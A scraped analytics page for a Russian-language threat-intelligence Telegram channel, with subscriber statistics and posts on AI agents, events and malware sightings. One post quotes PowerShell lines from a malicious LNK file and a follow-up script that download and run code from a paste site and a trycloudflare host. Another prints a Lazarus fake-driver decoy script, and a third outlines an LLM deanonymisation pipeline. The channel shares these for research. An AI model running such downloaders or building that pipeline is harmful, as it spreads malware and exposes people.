Secure Lemur
الذهاب إلى القناة على Telegram
Threat Intelligence,Threat Hunting, Информационная безопасность и прочее полезное. Все исключительно в познавательных целях. 🕸️EASM: @tinyscope Чат для обсуждений: @threat_chat
إظهار المزيد2 536
المشتركون
-824 ساعات
+27 أيام
+2530 أيام
جاري تحميل البيانات...
القنوات المماثلة
سحابة العلامات
لا توجد بيانات
هل تواجه مشاكل؟ يرجى تحديث الصفحة أو الاتصال بمدير الدعم الخاص بنا.
الإشارات الواردة والصادرة
---
---
---
---
---
---
جذب المشتركين
سبتمبر '26
سبتمبر '26
+67
في 0 قنوات
أغسطس '26
+92
في 1 قنوات
Get PRO
يوليو '26
+88
في 0 قنوات
Get PRO
يونيو '26
+95
في 0 قنوات
Get PRO
مايو '26
+76
في 0 قنوات
Get PRO
أبريل '26
+66
في 0 قنوات
Get PRO
مارس '26
+124
في 0 قنوات
Get PRO
فبراير '26
+102
في 0 قنوات
Get PRO
يناير '26
+112
في 0 قنوات
Get PRO
ديسمبر '25
+116
في 4 قنوات
Get PRO
نوفمبر '25
+99
في 0 قنوات
Get PRO
أكتوبر '25
+79
في 1 قنوات
Get PRO
سبتمبر '25
+90
في 0 قنوات
Get PRO
أغسطس '25
+129
في 1 قنوات
Get PRO
يوليو '25
+133
في 1 قنوات
Get PRO
يونيو '25
+85
في 0 قنوات
Get PRO
مايو '25
+101
في 3 قنوات
Get PRO
أبريل '25
+88
في 0 قنوات
Get PRO
مارس '25
+102
في 1 قنوات
Get PRO
فبراير '25
+83
في 0 قنوات
Get PRO
يناير '25
+111
في 0 قنوات
Get PRO
ديسمبر '24
+166
في 1 قنوات
Get PRO
نوفمبر '24
+264
في 0 قنوات
Get PRO
أكتوبر '24
+92
في 1 قنوات
Get PRO
سبتمبر '24
+99
في 3 قنوات
Get PRO
أغسطس '24
+94
في 3 قنوات
Get PRO
يوليو '24
+77
في 1 قنوات
Get PRO
يونيو '24
+89
في 1 قنوات
Get PRO
مايو '24
+79
في 2 قنوات
Get PRO
أبريل '24
+116
في 0 قنوات
Get PRO
مارس '24
+92
في 0 قنوات
Get PRO
فبراير '24
+98
في 1 قنوات
Get PRO
يناير '24
+108
في 2 قنوات
Get PRO
ديسمبر '23
+286
في 2 قنوات
Get PRO
نوفمبر '230
في 0 قنوات
Get PRO
أكتوبر '230
في 0 قنوات
Get PRO
سبتمبر '23
+673
في 0 قنوات
| التاريخ | نمو المشتركين | الإشارات | القنوات | |
| 17 سبتمبر | +3 | |||
| 16 سبتمبر | +2 | |||
| 15 سبتمبر | +7 | |||
| 14 سبتمبر | +2 | |||
| 13 سبتمبر | +10 | |||
| 12 سبتمبر | +5 | |||
| 11 سبتمبر | +2 | |||
| 10 سبتمبر | +1 | |||
| 09 سبتمبر | +4 | |||
| 08 سبتمبر | +6 | |||
| 07 سبتمبر | +8 | |||
| 06 سبتمبر | +3 | |||
| 05 سبتمبر | +2 | |||
| 04 سبتمبر | +1 | |||
| 03 سبتمبر | +3 | |||
| 02 سبتمبر | +4 | |||
| 01 سبتمبر | +4 |
منشورات القناة
В проекте по добычи данных из API токенов Telegram ботов (упоминал тут) появились обновления.
Soxoj его доработал - теперь там есть графический интерфейс и пофикшены баги с выгрузкой. Все еще самая удобная тулза для исследования телеграм ботов.
➡️ github.com/soxoj/telegram-bot-dumper
❤@seclemur |❤@threat_chat
| 2 | У всех после выхода Astra началось нещадное потребление токенов и на 5.6 моделях тоже?
Раньше для моих задач я даже 5ч лимита не исчерпывал, а сейчас молюсь чтобы на полчаса хватало 5.6 Sol.
Есть ли лайфхаки как предотвратить это? Знаю про codegraph, но может есть и другие способы , пишите ⬇️
у меня есть гипотеза что это все для того чтобы нищеброды за 20$ переходили на бесплатную версию и им показывали рекламу,а бояре с PRO подпиской пользовались токенами также спокойно в свое удовольствие😂 | 376 |
| 3 | لا يوجد نص... | 441 |
| 4 | Планирую быть завтра на offzone - пишите
Буду рад пообщаться 🤝 | 635 |
| 5 | Напоминаю про лайфхак с ученической почтой ✍🏼 | 733 |
| 6 | Shodan снова раздает пожизненный membership за 5$. Еще успеваешь 📈
❤@seclemur |❤ @threat_chat | 790 |
| 7 | Как говорится - любой уважающий себя AI-TI энтузиаст начинает парсить новости и статьи.
Вот и я поигрался с промптами и Hermes и карманную TI платформу в Obsidian. Скормил ему побольше разных TI блогов вендоров, описал что и в каком формате хочу получать: так чтобы между страницами хранилища obsidian была перелинковка сущностей в случае если они связаны. С таким же успехом можно просить его делать другие аутпуты, например, STIX и грузить в нужные системы (OpenCTI).
Промежуточный итог на видео. Особой практической пользы для меня в этом нет, но поиграться было интересно.
Затраты:
1 час времени
15$ на написание скиллов + ~10$ на сам парсинг текста
и оставил где-то на 10 дней собирать из RSS репорты какие сможет отловить.
Модели:
deepseek-v4-pro для общения с агентом и написания скиллов
deepseek-v4-flash для обработки текста статей (подешевле чтоб было)
❤@seclemur |❤ @threat_chat | 377 |
| 8 | Пссс, тут вакансия открыта:
https://hh.ru/vacancy/133732099
Поиск Threat Intelligence аналитика с большим желанием искать и изучать новые киберугрозы. Важен опыт именно изучения и поиск чего-то нового и неизвестного. Различные пет-проекты для превентивного хантинга сэмплов, сетевой инфраструктуры приветствуется и в почете - если таковой опыт имеется обязательно упомяни в сопроводительном письме. Если ты младший, но считаешь что можешь удивить, то тоже не стесняйся откликаться. | 692 |
| 9 | Пока промежуточный итоги такие:
1) AI агенты как таковые - это топ, концепция очень нравится.
2) OpenClaw невозможно лагающее создание. Админить его тяжело, пришлось сносить
3) Спасибо @poxek за рекомендацию в чате. Поставил hermes - работает на порядки стабильнее. Но, наверное, следующий этап это написание своего агента.
продолжаю тестировать, докручиваем с агентом скиллы, надеюсь получится кое-что интересное.
❤@seclemur |❤ @threat_chat | 391 |
| 10 | Я буду, приходите тоже :) | 522 |
| 11 | Всем привет 👋.
Инсека и Технологии киберугроз приглашают вас на CTI meetup #5.
🍻 обсуждаем рабочие моменты, делимся опытом
📆 23 мая, 14:00-20:00
📍 Место: Лофт «Москва» по адресу Москва, Берсеневская набережная, 6с3
Программа CTI meetup #5:
Сбор гостей 13:30-14:00
Начало выступлений 14:00
1. Threat Hunting в опенсорсе: злоумышленники используют ИИ, мы тоже, но есть нюанс
Раковский Станислав (руководитель группы Supply Chain Security в Positive Technologies)
2. Хватит «приручать фиды»: что реально работает в телекоме
Елютин Павел (руководитель направления анализа киберугроз, Билайн)
Снежков Александр (эксперт по анализу киберугроз, Билайн)
3. Докладчик уточняется
🍻 Кофе-брейк 15:30-16:00
4. Практический CTI 2.0: добро пожаловать в Cyberpunk. Ну почти.
Мешков Андрей (независимый эксперт)
5. Квиз
✌️17:00-20:00 С вас общение, с нас пиво.
Мы рады будем видеть всех желающих, но к сожалению, количество мест ограничено размерами помещения.
👉🏼 Зарегистрироваться | 475 |
| 12 | Сделал скилл который по плану будет детектить малварные C2 на потоке. Если будет адекватно работать, то сделаю отдельный канальчик с фидами как раньше было в @tinyscope.
Обзаведусь недостающими ключами к search engines и поставлю на поток. Сейчас решил добавить Shodan, FOFA, Zoomeye, Netlas. Какие еще предложения ?
+ может кто поделится готовыми рулями к таким поисковикам, буду рад перенять вашу опыт и мудрость.
Из полезного знаю такие ресурсы - ссылка1 ссылка2 | 446 |
| 13 | Следом другая статья, но тоже про агентов и безопасность. Это исследование про беспрерывную деанонимизацию пользователей с помощью LLM. То, что раньше требовало часов ручной работы OSINT-аналитика, теперь можно автоматизировать и поставить на поток😐
Ресерчеры рассказывают как они с помощью агентов и инструментов для них построили целый пайплайн по деанону пользователей:
1️⃣ Extract – из постов в социальных сетях пользователя модель вытаскивает сырые факты: город, работа, образование, хобби, события.
2️⃣ Search – LLM генерирует поисковые запросы на основе собранных данных и ищет похожих кандидатов в интернете.
3️⃣ Reason – сопоставляет найденные профили с извлечёнными фактами семантически.
4️⃣ Calibrate – оценивает уверенность и отбрасывает слабые совпадения.
LLM одновременно анализирует, ищет и сопоставляет информацию. Это позволяет автоматизировать деанонимизацию и работать в масштабе, что раньше делал только человек. Как-будто бы анонимность закончилась на некоторое время. Теперь если ты хочешь быть анонимным в интернете придется делать poisoning своих данных и использовать прочие уязвимости/слабости чтобы испортить LLM работу.
❤@seclemur |❤ @threat_chat | 508 |
| 14 | Теперь вы будете встречать меня на VT чаще. Я теперь нейрослоп 💃
А я всего лишь попросил его научиться отправлять комменты к индикаторам на VT, если в статье он находит какие-то IoC. | 423 |
| 15 | Наконец приступил к тестированию нашумевшего OpenClaw. С горем пополам,но развернул у себя его на домашней машине для тестов 😂 Сходу испытал детский восторг - штука невероятно адаптивная и очень гибкая. Выше скриншоты буквально сразу после первоначальной настройки. А сколько еще всего впереди.
Безусловно прежде чем запускать его проштудировал кучу постов в твиттере на тему того как он все удаляет и ломает. Морально к этому готов🤩
Основная гипотеза для проверки - можно ли с околонулевыми знанями в AI агентах сделать из него полноценного TI-аналитика-помощника, способного анализировать отчеты и делать расследования на потоке. А можем в ходе изучения появятся дополнительные мысли.
На старте план такой:
Скинул в него IoC -> он пробежался по всем источникам что у него есть и собрал отчет по нему, а также дал какие-то рекомендации.
Спойлер - научить его этому дело 5 минут. И ноль строчек кода самостоятельно написанных.
Интересна ли эта тема, нужно ли освещать ее чаще?
В целом, если были какие-то интересные идеи как использовать агента, но у тебя не доходили руки разобраться/протеститровать, то можно писать их в комменты, а я попробую это реализовать 👇
❤@seclemur |❤ @threat_chat | 447 |
| 16 | Не совсем тематика этого канала, но тоже важно подстветить.
В прошлый раз затронулась тема про то как разгрузить голову. В этот раз я тоже не с пустыми руками.
Нашел исследование которое точно объясняет, почему рабочий день часто ощущается как «работал, но ничего не сделал». Суть статьи в том что продуктивность зависит не от силы воли, а от трёх вещей: как часто тебя отвлекают, сколько времени уходит на возвращение в задачу и какой минимальный непрерывный отрезок нужен, чтобы вообще получить результат.
Каждый раз, когда отвлекаешься (например, проверка соцсетей или ответ на сообщение в чате), мозгу нужно время, чтобы вернуться в рабочий ритм. Исследования автора показывают, что на восстановление фокуса может уходить до 23 минут.
С помощью математических формул автор посчитал, каковы шансы в 100 рабочих днях найти три цельных 60-минутных отрезка:
• если отвлекаться 1 раз в час — 70%,
• если прерываться 2 раза в час, вероятность сокращается в 5 раз.
Самый забавный вывод - при частых прерываниях (например, каждые 3–5 минут) глубокая работа становится математически почти невозможной (!). А теперь вспомни как часто сыпятся уведомления или когда случайно открываешь телеграм и видишь непрочитанный пост в канале что не читал уже два года.
Замьютил несколько месяцев назад все чаты и приложения - стал более концентрированным и спокойным😋
Нет у тебя модного СДВГ, это просто обстоятельства в которых мы все живем.
Исследование
Другая полезная статья на русском
❤@seclemur |❤ @threat_chat | 496 |
| 17 | Иногда приходится и такие атаки изучать (видео 👆😁)
LNK файл с командой, которая качала видео пару недель назад:
-c "$b=(irm https://pastes.io/raw/aaaaigz0ex);[IO.File]::WriteAllBytes(\"$env:TEMP\v.mp4\",[Convert]::FromBase64String($b));start $env:TEMP\v.mp4"
Но забавно что сейчас на этом пастбине висит другой скрипт:
if (!(Test-Path "$env:LOCALAPPDATA\Discord\*\Discord.exe") -and !(Get-PSDrive -PSProvider FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "Discord.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 })) { exit }
Invoke-WebRequest -OutFile $env:AppData\RuntimeBroker.exe -Uri https://enjoyed-hop-definitions-tee.trycloudflare.com/64.exe
start $env:AppData\RuntimeBroker.exe
Интересно что это за аудитория, которую таргетят путем поиска дискорда на машине. Вероятно та же аудитория, что и писала этот скрипт😂 Пейлоад, увы, уже не доступен.
VirusTotal
❤@seclemur |❤ @threat_chat | 504 |
| 18 | Ультимативный гайд по организации инфраструктуры для пентестов - тык
Много интересных мыслей есть и для исследователей угроз. Но глава о CDN Relays особенно понравилась. Недавно натыкался на несколько примеров реальных атак, где злоумышленники использовали инфраструктуру Microsoft Azure в качестве командного центра. Главного загвоздка этой техники заключается в том, что домены от облачных сервисов микромягких чаще всего от греха подальше в вайтлистах и теряются в огромном потоке телеметрии, которую отправляет Windows на свои сервера. Попробуйте запустить машину хотя бы в том же самом Any.Run и посмотрите на количество улетевших данных просто потому что система запустилась😂 Тем самым всего за пару баксов аренды пэнтестеры прячут свое сетевое взаимодействие в легитимном трафике.
Ниже список доменов облачных сервисов Azure, за трафиком в сторону которых стоит присматривать бдительнее:
*.accesscontrol.windows.net
*.graph.windows.net
*.onmicrosoft.com
*.azure-api.net
*.biztalk.windows.net
*.blob.core.windows.net
*.cloudapp.net
*.cloudapp.azure.com
*.azurecr.io
*.azurecontainer.io
*.vo.msecnd.net
*.cosmos.azure.com
*.documents.azure.com
*.file.core.windows.net
*.azurefd.net
*.vault.azure.net
*.azmk8s.io
*.management.core.windows.net
*.origin.mediaservices.windows.net
*.azure-mobile.net
*.queue.core.windows.net
*.servicebus.windows.net
*.database.windows.net
*.azureedge.net
*.table.core.windows.net
*.trafficmanager.net
*.azurewebsites.net
*.visualstudio.com
❤@seclemur |❤ @threat_chat | 701 |
| 19 | Попалась очередная атака от Lazarus.
Сайт для прохождения собеседований. В данном случае на позицию маркетолога. После прохождения опроса из нескольких задач для успешного видеозвонка просит обновить драйвера, открыв командную строку и вставив нужную команду. Все бы ничего, да только в буфер обмена приходит немного расширенная команда, скачивающая полезную нагрузку
😂 Забавный момент:
для симуляции установки драйверов запускается vbs скрипт с таким содержанием:
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
objShell.Run "cmd /c title NVIDIA Display Driver Update Utility", 0, False
objShell.Run "cmd /c color 0A", 0, False
objShell.Run "cmd /c cls", 0, False
WScript.Echo ""
WScript.Echo "================================================"
WScript.Echo " NVIDIA Display Driver Update Utility"
WScript.Echo "================================================"
WScript.Echo ""
WScript.Echo "[INFO] Scanning for compatible hardware..."
WScript.Sleep 333
WScript.Echo "[INFO] Detected: NVIDIA GeForce Graphics Adapter"
WScript.Sleep 1167
WScript.Echo "[INFO] Current driver version: 536.99"
WScript.Sleep 500
WScript.Echo "[INFO] Available driver version: 581.80 (WHQL)"
WScript.Echo ""
WScript.Sleep 400
WScript.Echo "[STEP 1/5] Preparing driver installation..."
WScript.Sleep 2330
WScript.Echo " Status: Checking system compatibility"
Call AnimateDots(3, 50, 150)
WScript.Echo " OK"
WScript.Sleep 667
WScript.Echo " Status: Verifying disk space"
Call AnimateDots(3, 80, 200)
WScript.Echo " OK (2.1 GB required)"
WScript.Sleep 167
WScript.Echo " Status: Creating system restore point"
Call AnimateDots(4, 50, 150)
WScript.Echo " OK"
WScript.Sleep 67
WScript.Echo " Status: Preparation completed"
WScript.Echo ""
WScript.Sleep 67
Почитать про подобные киллчейны от этой группировки и их деанон можно тут - ссылка
IOCs:
breezyhr[.us
api.bitken[.cloud
93.127.215[.188
187.77.220[.50
❤@tinyscope | ❤@seclemur |❤ @threat_chat | 616 |
| 20 | Системный промпт он тоже отдает без проблем 😁
оставил в комментариях посмотреть 👇🏼 | 460 |
